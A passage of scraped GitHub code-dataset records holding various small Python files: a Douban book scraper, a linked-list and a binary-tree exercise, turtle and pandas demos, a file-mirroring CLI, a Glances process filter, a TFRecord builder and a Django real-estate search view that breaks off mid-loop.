    \", \"\\n\")\n book_info['briefIntroduction'] = book_info['briefIntroduction'].replace(\"
    \", \"\\n\")\n book_info['authorIntroduction'] = book_info['authorIntroduction'].replace(\" \", \"\")\n book_info['briefIntroduction'] = book_info['briefIntroduction'].replace(\" \", \"\")\n else:\n book_info['briefIntroduction'] = introduction[0]\n book_info['authorIntroduction'] = introduction[2]\n book_info['authorIntroduction'] = book_info['authorIntroduction'].replace(\"
    \", \"\\n\")\n book_info['briefIntroduction'] = book_info['briefIntroduction'].replace(\"
    \", \"\\n\")\n book_info['authorIntroduction'] = book_info['authorIntroduction'].replace(\" \", \"\")\n book_info['briefIntroduction'] = book_info['briefIntroduction'].replace(\" \", \"\")\n elif(introduction.__len__() == 4):\n book_info['briefIntroduction'] = introduction[1]\n book_info['authorIntroduction'] = introduction[3]\n book_info['authorIntroduction'] = book_info['authorIntroduction'].replace(\"
    \", \"\\n\")\n book_info['briefIntroduction'] = book_info['briefIntroduction'].replace(\"
    \", \"\\n\")\n book_info['authorIntroduction'] = book_info['authorIntroduction'].replace(\" \", \"\")\n book_info['briefIntroduction'] = book_info['briefIntroduction'].replace(\" \", \"\")\n elif(introduction.__len__() == 0):\n book_info['briefIntroduction'] = None\n book_info['authorIntroduction'] = None\n elif(introduction.__len__() == 1):\n if \"内容简介\" in book_page_content:\n book_info['briefIntroduction'] = introduction[0]\n book_info['briefIntroduction'] = book_info['briefIntroduction'].replace(\"
    \", \"\\n\")\n book_info['briefIntroduction'] = book_info['briefIntroduction'].replace(\" \", \"\")\n book_info['authorIntroduction'] = None\n elif \"作者简介\" in book_page_content:\n book_info['briefIntroduction'] = None\n book_info['authorIntroduction'] = introduction[0]\n book_info['authorIntroduction'] = book_info['authorIntroduction'].replace(\"
    \", \"\\n\")\n book_info['authorIntroduction'] = book_info['authorIntroduction'].replace(\" \", \"\")\n return book_info\n\ndef save_book_file(book_info,file_name):\n file_name = str(file_name)\n file_address = \"文学/\"+file_name+\".txt\"\n file_address = file_address.decode('utf-8')\n f = open(file_address,\"w\")\n f.write(str(\"title:\"+book_info['title']+'\\n'))\n f.write(str(\"author:\"+book_info['author']+'\\n'))\n f.write(str(\"press:\"+book_info['press']+'\\n'))\n try:\n f.write(str(\"translator:\"+book_info['translator']+'\\n'))\n except:\n f.write(\"translator:NULL\"+'\\n')\n f.write(str(\"ISBN:\"+book_info['ISBN']+'\\n'))\n f.write(str(\"publicationDate:\"+book_info['publicationDate']+'\\n'))\n f.write(str(\"pages:\"+book_info['pages']+'\\n'))\n f.write(str(\"price:\"+book_info['price']+'\\n'))\n f.write(str(\"briefIntroduction:\"+book_info['briefIntroduction']+'\\n'))\n f.write(str(\"authorIntroduction:\"+book_info['authorIntroduction']))\n f.close()\n return True\n\ndef save_book_info_json(book_info,file_name):\n book_info = json.dumps(book_info,sort_keys=True,ensure_ascii=False,indent = 2)\n file_name = str(file_name)\n file_address = \"科普/\" + file_name + \".json\"\n file_address = file_address.decode('utf-8')\n f = open(file_address, \"w\")\n f.write(book_info,ignore)\n f.close()\n return True\n\ndef save_book_cover(book_page_content,cover_name):\n cover_url = re.findall('''''',book_page_content)[0]\n cover_name = str(cover_name)\n cover_address = \"科普/\"+cover_name+\".jpg\"\n cover_address = cover_address.decode('utf-8')\n f = open(cover_address,\"wb\")\n cover = requests.get(cover_url).content\n f.write(cover)\n f.close()\n return True\n\n\nif __name__ == \"__main__\":\n # book_page_content = get_page_content('http://book.douban.com/tag/%E6%96%87%E5%AD%A6?start=0&type=T')\n # book_page = get_book_page(book_page_content)\n # j = 1\n # for url in book_page:\n # print str(j)+\":正在下载信息:\"+url\n # book_info_content = get_page_content(url)\n # book_info = get_book_info(book_info_content)\n # save_book_info_json(book_info,j)\n # print str(j)+\":正在下载图片:\"+url\n # save_book_cover(book_info_content,j)\n # j = j + 1\n # book_info_content = get_page_content('https://book.douban.com/subject/4820710/')\n # print get_book_info(book_info_content)\n home_page = 'https://book.douban.com/tag/%E7%A7%91%E6%99%AE?start='\n page = 0\n for page in range(30,50):\n book_home_page = home_page+str(page*20)+'&type=T'\n book_page_content = get_page_content(book_home_page)\n book_page = get_book_page(book_page_content)\n j = 1\n for url in book_page:\n print (str(page*20+j)+\":正在下载信息:\"+url)\n book_info_content = get_page_content(url)\n book_info = get_book_info(book_info_content)\n save_book_info_json(book_info, page*20+j)\n print (str(page*20+j) + \":正在下载图片:\" + url)\n save_book_cover(book_info_content, page*20+j)\n j = j + 1","repo_name":"ponngzhao/DoubanBooksSpider","sub_path":"spider.py","file_name":"spider.py","file_ext":"py","file_size_in_byte":9736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"36863823006","text":"# -*- coding:utf-8 -*-\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\nclass Solution:\n def deleteDuplication(self, pHead):\n # write code here\n if pHead is None or pHead.next is None:\n return pHead\n head1=pHead.next\n if head1.val!=pHead.val:\n pHead.next=self.deleteDuplication(head1)\n else:\n while pHead.val==head1.val and head1.next is not None:\n head1=head1.next\n if 
head1.val !=pHead.val:\n pHead=self.deleteDuplication(head1)\n else:\n return None\n return pHead\n","repo_name":"badandworse/leetcodeAns","sub_path":"剑指offer/chapter3/18-2.py","file_name":"18-2.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"3196985439","text":"import turtle\n\n# 별 모양으로 터틀 객체 생성\nt = turtle.Turtle()\nt.shape(\"turtle\")\nt.shapesize(2) # 크기를 2배로 설정\n\n# 내부를 채우기 위한 색 설정\nt.fillcolor(\"yellow\")\n\n# 내부를 채우기 시작\nt.begin_fill()\n\n# 별 모양 그리기\nfor i in range(5):\n t.forward(100) # 선 그리기\n t.right(144) # 144도 오른쪽으로 회전\n\n# 내부 채우기 종료\nt.end_fill()\n\n# 그리기 종료\nturtle.done()","repo_name":"qkrwhddms/soongsil_python","sub_path":"soongsil/myturtlestar.py","file_name":"myturtlestar.py","file_ext":"py","file_size_in_byte":451,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"32237378024","text":"import pandas as pd\n\nmyColumns = ('이름','나이')\nmyencoding = 'utf-8'\nmydata = [('김철수', 10), ('박영희', 20)]\n\nmyframe = pd.DataFrame(data=mydata, columns=myColumns)\nprint(myframe)\nmyframe2 = pd.DataFrame(data=mydata, columns=myColumns)\nprint(myframe2)\n\nmyframe.to_csv('csv_02_01.csv', index=False)\nmyframe2.to_csv('csv_02_02.csv', index=False, sep='#')\n\nmyframe = pd.read_csv('csv_02_01.csv')\nprint(myframe)\n\nmyframe2 = pd.read_csv('csv_02_02.csv')\nprint(myframe2)","repo_name":"seonghtun/allnew","sub_path":"python/pythondataproject/Ex-p187-03.py","file_name":"Ex-p187-03.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"24044703258","text":"def complain():\n text = input(\"Введите текст жалобы: \")\n f = open(\"complains.txt\", \"a\", encoding=\"utf-8\")\n f.write(text+\"\\n\")\n f.close()\n print(\"Ваша жалоба будет рассмотрена в скором времени.\")\n\n\ndef suggestions():\n print(\"Предложения SkysmartBank\")\n f = open(\"suggestions.txt\", \"r\", encoding=\"utf-8\")\n text = f.read()\n print(text)\n f.close()\n","repo_name":"deposit1337/new_finance_app","sub_path":"bank.py","file_name":"bank.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"7541303090","text":"# utility function to return new node\nclass newNode:\n def __init__(self, val):\n self.val = val\n self.left = None\n self.right = None\n\n\ndef isFoldable(root):\n if root is None:\n return True\n return isFoldableUtil(root.left, root.right)\n\n\ndef isFoldableUtil(n1, n2):\n if n1 == None and n2 == None:\n return True\n if n1 != None or n2 != None:\n return False\n d1 = isFoldableUtil(n1.left, n2.right)\n d2 = isFoldableUtil(n1.right, n2.left)\n return d1 and d2\n\n\n# Driver code\nif __name__ == \"__main__\":\n \n \"\"\" The constructed binary tree is \n 1 \n / \\ \n 2 3 \n \\ / \n 4 5 \n\"\"\"\n root = newNode(1)\n root.left = newNode(2)\n root.right = newNode(3)\n root.left.right = newNode(4)\n root.right.left = newNode(5)\n \n if isFoldable(root):\n print(\"tree is foldable\")\n else:\n print(\"tree is not foldable\")\n \n# This code is contributed by\n# Anupam Baranwal(anupambaranwal)\n","repo_name":"OrangeBirdDrinksWater/PythonDS","sub_path":"DSbinarytree/9foldable1.py","file_name":"9foldable1.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} 
+{"seq_id":"20247036727","text":"import cgi\nimport os\nimport shutil\nimport sqlite3\nimport subprocess\nfrom pathlib import Path\nfrom tempfile import NamedTemporaryFile, TemporaryDirectory\nfrom typing import Union\nfrom urllib.parse import urlparse\n\nimport click\nimport requests\nfrom click.exceptions import ClickException\nfrom click_aliases import ClickAliasedGroup\n\nMIRROR_DIR = Path.home().joinpath(\".mirror\")\nDB_PATH = MIRROR_DIR.joinpath(\"db\")\nSAVE_DIR = MIRROR_DIR.joinpath(\"bin\")\n\nconn: sqlite3.Connection\ncursor: sqlite3.Cursor\n\nclass OctalParamType(click.ParamType):\n\t\"\"\"chmod-like octal parameters\"\"\"\n\tname = \"integer\"\n\t\n\tdef convert(self, value, param, ctx):\n\t\tif isinstance(value, int):\n\t\t\treturn value\n\t\ttry:\n\t\t\treturn int(value, 8)\n\t\texcept ValueError:\n\t\t\tself.fail(f\"{value!r} is not a valid octal integer\", param, ctx)\n\nOCTAL_PARAM = OctalParamType()\n\ndef main():\n\tglobal conn\n\tglobal cursor\n\t\n\t#create dirs\n\tSAVE_DIR.mkdir(parents=True, exist_ok=True)\n\tDB_PATH.touch(exist_ok=True)\n\t\n\t#setup db\n\tconn = sqlite3.connect(DB_PATH)\n\tcursor = conn.cursor()\n\twith conn:\n\t\tcursor.execute(\n\t\t\t\"\"\"CREATE TABLE IF NOT EXISTS mirrors (\n\t\t\t\tfilename text, \n\t\t\t\turl text, \n\t\t\t\tarchive_filename text, \n\t\t\t\tpost_install text\n\t\t\t);\"\"\"\n\t\t)\n\t\n\t#run cli\n\tmirror()\n\tconn.close()\n\n@click.group(context_settings={\"help_option_names\": [\"-h\", \"--help\"]}, cls=ClickAliasedGroup)\ndef mirror():\n\tpass\n\n@mirror.command(aliases=[\"addf\", \"add\", \"a\"])\n@click.argument(\"url\")\n@click.option(\"--filename\", \"-f\", type=Path)\n@click.option(\"--mode\", \"-m\", type=OCTAL_PARAM, default=\"755\", show_default=True)\n@click.option(\n\t\"--post-install\", \"--post\", \"-p\", help=\"arbitary shell script to run after installation\"\n)\ndef add_file(url: str, filename: Path, mode: int, post_install: str):\n\tprint(f\"Adding {url}\")\n\ttry:\n\t\tfilename = download_file(url, filename)\n\texcept (ValueError, FileExistsError, requests.exceptions.HTTPError) as e:\n\t\traise ClickException(str(e)) from e\n\tfilename.chmod(mode)\n\t\n\trun_post_install(filename, post_install)\n\t\n\twith conn:\n\t\tcursor.execute(\n\t\t\t\"INSERT INTO mirrors VALUES(?, ?, ?, ?)\", (str(filename), url, None, post_install)\n\t\t)\n\tprint(f\"Added {url} at {shorten_path(filename)}\")\n\n@mirror.command(aliases=[\"add-ar\", \"adda\"])\n@click.argument(\"url\")\n@click.argument(\"archive_filename\")\n@click.option(\"--filename\", \"-f\", type=Path)\n@click.option(\"--mode\", \"-m\", type=OCTAL_PARAM, default=\"755\", show_default=True)\n@click.option(\n\t\"--post-install\", \"--post\", \"-p\", help=\"arbitary shell script to run after installation\"\n)\ndef add_archive(url: str, archive_filename: str, filename: Path, mode: int, post_install: str):\n\tprint(f\"Adding archive {url}\")\n\ttry:\n\t\tfilename = download_file(url, filename, archive_filename)\n\texcept (ValueError, FileExistsError) as e:\n\t\traise ClickException(str(e)) from e\n\tfilename.chmod(mode)\n\t\n\trun_post_install(filename, post_install)\n\t\n\twith conn:\n\t\tcursor.execute(\n\t\t\t\"INSERT INTO mirrors VALUES(?, ?, ?, ?)\",\n\t\t\t(str(filename), url, archive_filename, post_install)\n\t\t)\n\tprint(f\"Added archive {url} at {shorten_path(filename)}\")\n\n@mirror.command(aliases=[\"list\", \"ls\", \"l\"])\ndef list_files():\n\twith conn:\n\t\tprint(\"Mirrors:\")\n\t\tmirrors = cursor.execute(\"SELECT filename, url FROM 
mirrors\")\n\t\tfound = False\n\t\tfor filename, url in mirrors:\n\t\t\tfound = True\n\t\t\tprint(f\"{shorten_path(filename):30} {url}\")\n\t\tif not found:\n\t\t\tprint(\"None\")\n\n@mirror.command(aliases=[\"update\", \"u\"])\ndef update_files():\n\twith conn:\n\t\tfor filename, url, archive_filename, post_install in cursor.execute(\n\t\t\t\"SELECT filename, url, archive_filename, post_install FROM mirrors\"\n\t\t):\n\t\t\tfilename = Path(filename)\n\t\t\tprint(f\"Updating {shorten_path(filename)} with {url}\")\n\t\t\ttry:\n\t\t\t\tdownload_file(url, filename, archive_filename, exist_ok=True)\n\t\t\texcept (ValueError, FileExistsError, requests.exceptions.HTTPError) as e:\n\t\t\t\traise ClickException(str(e)) from e\n\t\t\t\n\t\t\trun_post_install(filename, post_install)\n\tprint(\"Updated!\")\n\n@mirror.command(aliases=[\"rm\", \"r\"])\n@click.argument(\"filename\")\n@click.option(\"--glob\", \"-g\", is_flag=True)\ndef remove_file(filename: str, glob: bool):\n\tpath = Path(filename).expanduser().resolve() #convert relative path to absolute\n\tprint(f\"Deleting {shorten_path(path)}\")\n\t#error handling\n\tif not path.exists():\n\t\tprint(\"Warning: File doesn't exist in filesystem\")\n\tif not glob and not file_in_db(path):\n\t\traise ClickException(f\"File {shorten_path(path)} not in database\")\n\t#handle db\n\twith conn:\n\t\tif glob:\n\t\t\tconn.execute(\"DELETE FROM mirrors WHERE filename GLOB ?\", (str(path), ))\n\t\telse:\n\t\t\tconn.execute(\"DELETE FROM mirrors WHERE filename = ?\", (str(path), ))\n\tprint(f\"Deleted {shorten_path(path)}\")\n\n@mirror.command()\ndef delete_db():\n\tif click.confirm('Are you sure you want to delete the database?'):\n\t\tshutil.rmtree(SAVE_DIR)\n\t\tDB_PATH.unlink()\n\n@mirror.command(aliases=[\"sqlite\"])\ndef sqlite_shell():\n\tsubprocess.run([\"sqlite3\", DB_PATH], check=False)\n\ndef download_file(\n\turl: str,\n\tfilename: Union[str, Path],\n\tarchive_filename: str = None,\n\texist_ok: bool = False\n) -> Path:\n\tresp = requests.get(url)\n\tresp.raise_for_status()\n\t\n\t#get the filename from the response\n\ttry:\n\t\tresp_filename = SAVE_DIR.joinpath(\"a\").with_name(\n\t\t\tcgi.parse_header(resp.headers[\"Content-Disposition\"])[1][\"filename\"]\n\t\t)\n\texcept KeyError:\n\t\tresp_filename = SAVE_DIR.joinpath(urlparse(url).path.split(\"/\")[-1])\n\t\n\tif filename is None:\n\t\tif archive_filename is not None:\n\t\t\tfilename = SAVE_DIR.joinpath(archive_filename)\n\t\telse:\n\t\t\tfilename = resp_filename\n\telse:\n\t\tfilename = Path(filename)\n\t\n\tfilename = filename.expanduser().resolve() # convert relative paths to absolute paths\n\tif filename == SAVE_DIR:\n\t\traise ValueError(\"Empty filename\")\n\t\n\t#check if file exists in db\n\tif filename.exists() and not exist_ok:\n\t\tif file_in_db(filename):\n\t\t\traise ValueError(f\"File {shorten_path(filename)} already in database\")\n\t\telse:\n\t\t\tprint(f\"Warning: File {shorten_path(filename)} already exists\")\n\tif archive_filename is None:\n\t\twith open(filename, \"wb\") as f:\n\t\t\tf.write(resp.content)\n\telse:\n\t\t# archive handling\n\t\t# uses partition on .name instead of .suffix due to .tar.gz\n\t\twith NamedTemporaryFile(suffix=\".\" + resp_filename.name.partition(\".\")[2]) as f:\n\t\t\twith TemporaryDirectory() as tmp_dir:\n\t\t\t\t#unpack into tmp_dir\n\t\t\t\tf.write(resp.content)\n\t\t\t\tshutil.unpack_archive(f.name, tmp_dir)\n\t\t\t\t#path to copy from\n\t\t\t\told_path = Path(tmp_dir).joinpath(archive_filename)\n\t\t\t\tif 
old_path.is_file():\n\t\t\t\t\tshutil.copyfile(old_path, filename)\n\t\t\t\telif old_path.is_dir():\n\t\t\t\t\ttry:\n\t\t\t\t\t\tshutil.rmtree(filename)\n\t\t\t\t\texcept FileNotFoundError: #ignore if target directory doesn't exist\n\t\t\t\t\t\tpass\n\t\t\t\t\tshutil.copytree(old_path, filename)\n\t\t\t\telse:\n\t\t\t\t\traise ValueError(f\"File {archive_filename} isn't a file or a directory\")\n\treturn filename\n\ndef run_post_install(filename: Path, post_install: str):\n\tif post_install is not None:\n\t\tos.chdir(filename.parent)\n\t\ttry:\n\t\t\tsubprocess.run(post_install, shell=True, check=True)\n\t\texcept subprocess.CalledProcessError as e:\n\t\t\traise ClickException(str(e)) from e\n\ndef file_in_db(filename: Path) -> bool:\n\t\"\"\"check if file is in the database\"\"\"\n\twith conn:\n\t\tcursor.execute(\"SELECT COUNT(filename) FROM mirrors WHERE filename = ?\", (str(filename), ))\n\t\treturn cursor.fetchone()[0] > 0\n\ndef shorten_path(filename: Union[str, Path]) -> str:\n\t\"\"\"shorten /home/user/ to ~\"\"\"\n\tfilename = Path(filename)\n\ttry:\n\t\treturn \"~/\" + str(filename.relative_to(Path.home()))\n\texcept ValueError:\n\t\treturn str(filename)\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"SuperStormer/mirror","sub_path":"mirror/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7464,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"7919936882","text":"import re\n\nfrom glances.logger import logger\n\n\nclass GlancesFilter(object):\n\n \"\"\"Allow Glances to filter processes\n\n >>> f = GlancesFilter()\n >>> f.filter = '.*python.*'\n >>> f.filter\n '.*python.*'\n >>> f.key\n None\n >>> f.filter = 'user:nicolargo'\n >>> f.filter\n 'nicolargo'\n >>> f.key\n 'user'\n >>> f.filter = 'username:.*nico.*'\n >>> f.filter\n '.*nico.*'\n >>> f.key\n 'username'\n \"\"\"\n\n def __init__(self):\n # Filter entered by the user (string)\n self._filter_input = None\n # Filter to apply\n self._filter = None\n # Filter regular expression\n self._filter_re = None\n # Dict key where the filter should be applied\n # Default is None: search on command line and process name\n self._filter_key = None\n\n @property\n def filter_input(self):\n \"\"\"Return the filter given by the user (as a sting)\"\"\"\n return self._filter_input\n\n @property\n def filter(self):\n \"\"\"Return the current filter to be applied\"\"\"\n return self._filter\n\n @filter.setter\n def filter(self, value):\n \"\"\"Set the filter (as a sting) and compute the regular expression\n A filter could be one of the following:\n - python > Process name of cmd start with python\n - .*python.* > Process name of cmd contain python\n - username:nicolargo > Process of nicolargo user\n \"\"\"\n self._filter_input = value\n if value is None:\n self._filter = None\n self._filter_key = None\n else:\n new_filter = value.split(':')\n if len(new_filter) == 1:\n self._filter = new_filter[0]\n self._filter_key = None\n else:\n self._filter = new_filter[1]\n self._filter_key = new_filter[0]\n\n self._filter_re = None\n if self.filter is not None:\n logger.info(\"Set filter to {} on key {}\".format(self.filter, self.filter_key))\n # Compute the regular expression\n try:\n self._filter_re = re.compile(self.filter)\n logger.debug(\"Filter regex compilation OK: {}\".format(self.filter))\n except Exception as e:\n logger.error(\"Cannot compile filter regex: {} ({})\".format(self.filter, e))\n self._filter = None\n self._filter_re = None\n 
self._filter_key = None\n\n @property\n def filter_re(self):\n \"\"\"Return the filter regular expression\"\"\"\n return self._filter_re\n\n @property\n def filter_key(self):\n \"\"\"key where the filter should be applied\"\"\"\n return self._filter_key\n\n def is_filtered(self, process):\n \"\"\"Return True if the process item match the current filter\n The proces item is a dict.\n \"\"\"\n if self.filter is None:\n # No filter => Not filtered\n return False\n\n if self.filter_key is None:\n # Apply filter on command line and process name\n return self._is_process_filtered(process, key='cmdline') and self._is_process_filtered(process, key='name')\n else:\n # Apply filter on \n return self._is_process_filtered(process)\n\n def _is_process_filtered(self, process, key=None):\n \"\"\"Return True if the process[key] should be filtered according to the current filter\"\"\"\n if key is None:\n key = self.filter_key\n try:\n # If the item process[key] is a list, convert it to a string\n # in order to match it with the current regular expression\n if isinstance(process[key], list):\n value = ' '.join(process[key])\n else:\n value = process[key]\n except KeyError:\n # If the key did not exist\n return False\n try:\n return self._filter_re.match(value) is None\n except AttributeError:\n # Filter processes crashs with a bad regular expression pattern (issue #665)\n return False\n","repo_name":"santazhang/sandbox","sub_path":"glances_all/Glances-2.11.1/glances/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":4094,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"45"} +{"seq_id":"441548429","text":"import tensorflow as tf\nimport random\nimport os\nfrom os import scandir\nimport cv2\n\nFLAGS = tf.flags.FLAGS\n\ntf.flags.DEFINE_string('train_input_dir', 'data/train',\n 'train input directory, default: data/train')\n\ntf.flags.DEFINE_string('output_dir', 'data/tfrecords/train.tfrecords',\n 'output directory, default: data/tfrecords/train.tfrecords')\n\n\ndef data_reader(train_input_dir, shuffle):\n \"\"\"Read images from input_dir then shuffle them\n Args:\n train_input_dir: string, path of input train dir, e.g., /path/to/dir\n Returns:\n file_paths: list of strings\n \"\"\"\n train_file_paths = []\n train_image_ids = []\n train_image_widths = []\n train_image_heights = []\n\n for img_file in scandir(train_input_dir):\n if img_file.name.endswith('.jpg') and img_file.is_file():\n train_file_paths.append(img_file.path)\n train_image_ids.append(img_file.name[:-4])\n img = cv2.imread(img_file.path, cv2.IMREAD_COLOR)\n height, width, _ = img.shape\n train_image_heights.append(height)\n train_image_widths.append(width)\n\n if shuffle is True:\n # Shuffle the ordering of all image files in order to guarantee\n # random ordering of the images with respect to label in the\n # saved TFRecord files. 
Make the randomization repeatable.\n shuffled_index = list(range(len(train_file_paths)))\n random.seed(12345)\n random.shuffle(shuffled_index)\n\n train_file_paths = [train_file_paths[i] for i in shuffled_index]\n train_image_ids = [train_image_ids[i] for i in shuffled_index]\n train_image_heights = [train_image_heights[i] for i in shuffled_index]\n train_image_widths = [train_image_widths[i] for i in shuffled_index]\n\n return train_file_paths, train_image_ids, train_image_heights, train_image_widths\n\n\ndef _int64_feature(value):\n \"\"\"Wrapper for inserting int64 features into Example proto.\"\"\"\n if not isinstance(value, list):\n value = [value]\n return tf.train.Feature(int64_list=tf.train.Int64List(value=value))\n\n\ndef _bytes_feature(value):\n \"\"\"Wrapper for inserting bytes features into Example proto.\"\"\"\n return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))\n\n\ndef _strs_feature(value):\n \"\"\"Wrapper for inserting strs features into Example proto.\"\"\"\n return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))\n\n\ndef _convert_to_example(train_data, train_id, train_height, train_width):\n \"\"\"Build an Example proto for an example.\n Args:\n train_data: string, path to an image file, e.g., '/path/to/example.JPG'\n Returns:\n Example proto\n \"\"\"\n\n example = tf.train.Example(features=tf.train.Features(feature={\n 'image/train': _bytes_feature(train_data),\n 'image_id/train': _strs_feature(train_id),\n 'image_height/train': _int64_feature(train_height),\n 'image_width/train': _int64_feature(train_width)\n }))\n return example\n\n\ndef data_writer(train_input_dir, output_file):\n \"\"\"Write data to tfrecords\n \"\"\"\n train_file_paths, train_image_ids, train_image_heights, train_image_widths = data_reader(train_input_dir, True)\n\n # create tfrecords dir if not exists\n output_dir = os.path.dirname(output_file)\n try:\n os.makedirs(output_dir)\n except os.error:\n pass\n\n images_num = len(train_file_paths)\n\n # dump to tfrecords file\n writer = tf.python_io.TFRecordWriter(output_file)\n\n for i in range(images_num):\n train_file_path = train_file_paths[i]\n train_image_id = train_image_ids[i]\n train_image_height = train_image_heights[i]\n train_image_width = train_image_widths[i]\n train_image_id = bytes(train_image_id, 'utf-8')\n\n with tf.gfile.FastGFile(train_file_path, 'rb') as f:\n train_data = f.read()\n\n example = _convert_to_example(train_data, train_image_id, train_image_height, train_image_width)\n writer.write(example.SerializeToString())\n\n if (i + 1) % 1000 == 0:\n print(\"Processed {}/{}.\".format(i + 1, images_num))\n print(\"Done.\")\n writer.close()\n\n\ndef main(unused_argv):\n print(\"Convert train and label to tfrecords...\")\n data_writer(FLAGS.train_input_dir, FLAGS.output_dir)\n\n\nif __name__ == '__main__':\n tf.app.run()\n","repo_name":"HEIDIES/MultiPoseNet-tensorflow","sub_path":"build_data.py","file_name":"build_data.py","file_ext":"py","file_size_in_byte":4378,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"45"} +{"seq_id":"9569676068","text":"# def FactorialSeries(N):\n# if N == 0: return 1\n# resultСalc = N * FactorialSeries(N - 1)\n# print(resultСalc, end = \" \")\n# return resultСalc\n\nimport math\n\nuserInput = int(input(\"Введите число: \"))\nres = [i for i in range (1, userInput+1)]\nres = list(map(lambda temp: math.factorial(temp), res))\n\nprint 
(res)","repo_name":"ImBeavis/Homework_python","sub_path":"Seminar_6/Task_1.py","file_name":"Task_1.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"5836515586","text":"from django.shortcuts import render\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom rest_framework.generics import ListAPIView, RetrieveAPIView \nfrom rest_framework import permissions\nfrom .models import Listestates\nfrom .serializers import ListestatesSerializer, listestatesDetailSerializer\nfrom datetime import datetime, timezone, timedelta\n# Create your views here.\n\nclass ListestatesView(ListAPIView):\n queryset = Listestates.objects.order_by('-list_date').filter(is_published=True)\n permissions_classes=(permissions.AllowAny, )\n serializer_class = ListestatesSerializer\n lookup_field = 'slug'\n\nclass ListestateView(RetrieveAPIView):\n queryset = Listestates.objects.order_by('-list_date').filter(is_published=True)\n serializer_class = listestatesDetailSerializer\n lookup_field = 'slug'\n\nclass SearchView(APIView):\n permission_classes = (permissions.AllowAny, )\n serializer_class = ListestatesSerializer\n\n def post(self, request, format=None):\n queryset = Listestates.objects.order_by('-list_date').filter(is_published=True)\n data= self.request.data\n print(queryset)\n sale_type = data['sale_type']\n queryset = queryset.filter(sale_type__iexact=sale_type)\n price = data['price']\n # price=[''.join(re.findall('[0-9]+',i)) for i in price]\n if price == '$0+':\n price = 0\n elif price == '$200,000+':\n price = 200000\n elif price == '$400,000+':\n price = 400000\n elif price == '$600,000+':\n price = 600000\n elif price == '$800,000+':\n price = 800000\n elif price == '$1,000,000+':\n price = 1000000\n elif price == '$1,200,000+':\n price = 1200000\n elif price == '$1,500,000+':\n price = 1500000\n elif price == 'Any':\n price = -1\n\n if price != -1:\n queryset = queryset.filter(price__gte=price)\n\n bedrooms = data['bedrooms']\n # bedrooms=[''.join(re.findall('[0-9]+',i)) for i in bedrooms]\n if bedrooms == '0+':\n bedrooms = 0\n elif bedrooms == '1+':\n bedrooms = 1\n elif bedrooms == '2+':\n bedrooms = 2\n elif bedrooms == '3+':\n bedrooms = 3\n elif bedrooms == '4+':\n bedrooms = 4\n elif bedrooms == '5+':\n bedrooms = 5\n\n queryset = queryset.filter(bedrooms__gte=bedrooms)\n\n home_type = data ['home_type']\n queryset = queryset.filter(home_type__iexact=home_type)\n\n # bathrooms = data['bathrooms']\n # # bathrooms=[''.join(re.findall('[0-9]+',i)) for i in bathrooms]\n # if bathrooms == '0+':\n # bathrooms = 0.0\n # elif bathrooms == '1+':\n # bathrooms = 1.0\n # elif bathrooms == '2+':\n # bathrooms = 2.0\n # elif bathrooms == '3+':\n # bathrooms = 3.0\n # elif bathrooms == '4+':\n # bathrooms = 4.0\n\n # queryset = queryset.filter(bathrooms__gte=bathrooms)\n\n sqft = data['sqft']\n # sqft=[''.join(re.findall('[0-9]+',i)) for i in sqft]\n if sqft == '1000+':\n sqft = 1000\n elif sqft == '1200+':\n sqft = 1200\n elif sqft == '1500+':\n sqft = 1500\n elif sqft == '2000+':\n sqft = 2000\n elif sqft == 'Any':\n sqft = 0\n\n if sqft != 0:\n queryset = queryset.filter(sqft__gte=sqft)\n\n # days_passed = data['days_passed']\n # # days_passed=[''.join(re.findall('[0-9]+',i)) for i in days_passed]\n # if days_passed == '1 or less':\n # days_passed = 1\n # elif days_passed == '2 or less':\n # days_passed = 2\n # elif days_passed == '5 or less':\n # days_passed = 5\n # 
elif days_passed == '10 or less':\n # days_passed = 10\n # elif days_passed == '20 or less':\n # days_passed = 20\n # elif days_passed == 'Any':\n # days_passed = 0\n \n\n # for query in queryset:\n # num_days = (datetime.now(timezone.utc)- query.list_date).days\n\n # if days_passed !=0:\n # if num_days > days_passed:\n # slug = query.slugqueryset = queryset.exclude(slug__iexact=slug)\n\n #has_photos= data['has_photos']\n # has_photos=[''.join(re.findall('[0-9]+',i)) for i in has_photos]\n\n # def pic(i):\n # if 'i.photo_'+i:\n # count += 1\n # if has_photos == '1+':\n # has_photos = 1\n # elif has_photos == '3+':\n # has_photos = 3\n # elif has_photos == '5+':\n # has_photos = 5\n # elif has_photos == '10+':\n # has_photos = 10\n # elif has_photos == '15+':\n # has_photos = 15\n \n for query in queryset:\n count = 0\n if query.photo_1:\n count += 1\n if query.photo_2:\n count += 1\n if query.photo_3:\n count += 1\n if query.photo_4:\n count += 1\n if query.photo_5:\n count += 1\n if query.photo_6:\n count += 1\n if query.photo_7:\n count += 1\n if query.photo_9:\n count += 1\n if query.photo_10:\n count += 1\n if query.photo_11:\n count += 1\n if query.photo_12:\n count += 1\n if query.photo_13:\n count += 1\n if query.photo_14:\n count += 1\n if query.photo_15:\n count += 1\n \n \n # for query in 